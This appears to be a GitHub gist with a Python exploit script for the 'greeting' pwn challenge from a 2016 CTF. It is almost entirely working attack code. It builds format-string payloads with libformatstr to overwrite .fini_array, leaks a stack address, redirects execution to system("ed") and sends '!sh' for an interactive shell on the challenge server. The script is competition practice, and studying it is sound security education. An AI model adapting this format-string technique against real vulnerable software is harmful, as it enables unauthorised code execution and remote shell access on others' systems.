Create a gist now

Instantly share code, notes, and snippets.

greeting - Tokyo Westerns / MMA CTF 2nd 2016
# -*- coding: utf-8 -*-
import os
import sys
import time
import re
import struct
import socket
from libformatstr import FormatStr
p = lambda x: struct.pack('<I', x)
u = lambda x: struct.unpack('<I', x)[0]
def connect(host, port):
return socket.create_connection((host, port))
def recvuntil(st, debug=False):
ret = ''
while st not in ret:
lret = s.recv(1)
if debug and len(lret) > 0:
sys.stdout.write(lret)
ret += lret
return ret
def recvn(n):
ret = ''
while len(ret) != n:
ret += s.recv(1)
return ret
def interact():
import telnetlib
t = telnetlib.Telnet()
t.sock = s
t.interact()
def process(cmd):
import subprocess
return subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
REMOTE = len(sys.argv) >= 2 and sys.argv[1] == 'r'
if REMOTE:
host = 'pwn2.chal.ctf.westerns.tokyo'
port = 16317
else:
host = '127.0.0.1'
port = 4000
s = connect(host, port)
fsb = FormatStr()
fsb[0x8049934] = 0x80485ed # .fini_array -> main
s.send('AA' + fsb.payload(12, start_len=20) + '%2$p' + '\n')
stack = int(recvuntil(' :)')[-13:-3], 16) + 0x80 - 0x110
print 'stack : %x' % stack
fsb = FormatStr()
fsb[stack] = 0x8048490
fsb[stack+8] = 0x80482bf # system("ed")
s.send('AA' + fsb.payload(12, start_len=20) + '\n')
s.send('!sh\n')
interact()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment